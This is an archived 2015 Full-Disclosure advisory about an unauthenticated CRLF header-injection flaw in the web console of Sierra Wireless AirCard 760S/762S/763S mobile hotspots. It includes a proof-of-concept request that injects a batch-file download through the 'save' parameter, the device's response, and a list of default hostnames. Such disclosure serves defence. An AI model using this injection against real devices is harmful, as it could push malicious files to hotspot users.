| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 14 Jan 2015 11:38:56 +1100 From: Luke Walker <luke@...ckduck.nu> To: fulldisclosure@...lists.org Subject: [FD] Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection [*] Overview Sierra Wireless produces a mobile wi-fi hotspot device that is popular amongst telecommunication companies for re-branding to suit local markets. The AirCard 760S/762S/763S Web-based Administrative Console suffers from a HTTP header injection that allows an attacker to inject a file into the HTTP response from the device. [*] Description The configuration export function allows the name of the exported configuration file to be customised, but the parameter "save" is not filtered. http://<routerURL>/export.cfg?save=export.cfg [*] Traffic sample from POC (curl -L) (sample below tested on firmware SWI9200H2_03.05.11.00AP) > GET /export.cfg?save= > export.bat%0d%0aContent-type:%20application/bat%0d%0a%0d%0apause%0d%0a > &sessionId=00000001%2DhYL4H > 4jC125ApaZyFCHePwPINyFUdYf HTTP/1.1 > > User-Agent: curl/7.40.0 > > Host: router.4g > > Accept: */* > > > < HTTP/1.1 200 OK > < Server: httpd/2.7 (sierra; D4C) > < Date: Mon, 12 Jan 2015 05:32:38 GMT > < Connection: keep-alive > < Cache-Control: no-cache > < Content-Disposition: attachment; filename=export.bat > < Content-type: application/bat > > pause > Content-type: application/octet-stream > Transfer-encoding: chunked > 3a > # > # Configuration export from Telstra WI-FI 4G > # > # Model: [*] Limitations While it does not require authentication, it does require user interaction and knowledge of the hotspot's hostname. However, the default hotspot names are well-known, based on the OEM'd version of the AirCard Mobile Hotspot: * 763S - Sierra Wireless Original OEM - http://aircard.hotspot * 763S - Rogers Rocket Mobile Hotspot - http://rogers.hotspot * 762S - DNA 4G WLAN Mokkula - http://dna.mokkula * 760S - Telstra Mobile WiFi 4G - http://telstra.4g * 760S - BigPond Mobile - http://bigpond.4g [*] Workaround Change the name and IP address of the device to something other than the default settings. [*] Vendor Contact An attempt to contact both Sierra Wireless and NETGEAR (who seem to own support of the device now) was unsuccessful. regards , Luke _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists